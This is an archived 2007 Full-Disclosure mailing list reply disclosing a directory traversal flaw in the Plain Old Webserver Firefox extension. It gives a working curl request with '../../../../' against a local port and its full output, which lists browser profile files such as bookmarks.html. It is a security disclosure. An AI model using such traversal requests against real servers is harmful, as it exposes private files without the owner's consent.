[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] [WEB SECURITY] Plain Old Webserver - The coolest firefox extension

Plain Old Web Server 
Good  Old Dir Traversal

curl "127.0.0.1:6670/../../../../" -kivvv
* About to connect() to 127.0.0.1 port 6670
*   Trying 127.0.0.1... connected
* Connected to 127.0.0.1 (127.0.0.1) port 6670
> GET /../../../../ HTTP/1.1
> User-Agent: HackTheHacker(tm)
> Host: 127.0.0.1:6670
> Accept: */*
> 
< HTTP/1.1 200 OK
HTTP/1.1 200 OK
< Set-Cookie: bc_test=true; expires=Thu, 05 Nov 2009 18:35:36 GMT;
path=/;
Set-Cookie: bc_test=true; expires=Thu, 05 Nov 2009 18:35:36 GMT; path=/;
< Content-Type: text/html
Content-Type: text/html
< pow_server: POW/0.0.7
pow_server: POW/0.0.7
< Content-Location: /../../../../
Content-Location: /../../../../
< Content-Length: 280
Content-Length: 280

<br><br><br><br>
<a href='/../../../../firefox/'>firefox/</a><br>
<a href='/../../../../bookmarks.html'>bookmarks.html</a><br>
<a href='/../../../../appreg'>appreg</a><br>
<a href='/../../../../default/'>default/</a><br>
<a href='/../../../../pluginreg.dat'>pluginreg.dat</a><br>
* Connection #0 to host 127.0.0.1 left intact
* Closing connection #0


A new motto is on the way:
HackTheHacker (ascii (tm))

:)

Cheers,
Stefano

Il giorno ven, 09/02/2007 alle 16.23 +0000, pdp (architect) ha scritto:
> http://www.gnucitizen.org/blog/plain-old-webserver
> 
> Must have Firefox Extension that allows you to do all sorts of crazy stuff.
> 
> https://addons.mozilla.org/firefox/3002/
> 
-- 
...oOOo...oOOo....
Stefano Di Paola
Software & Security Engineer

Web: www.wisec.it
..................

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/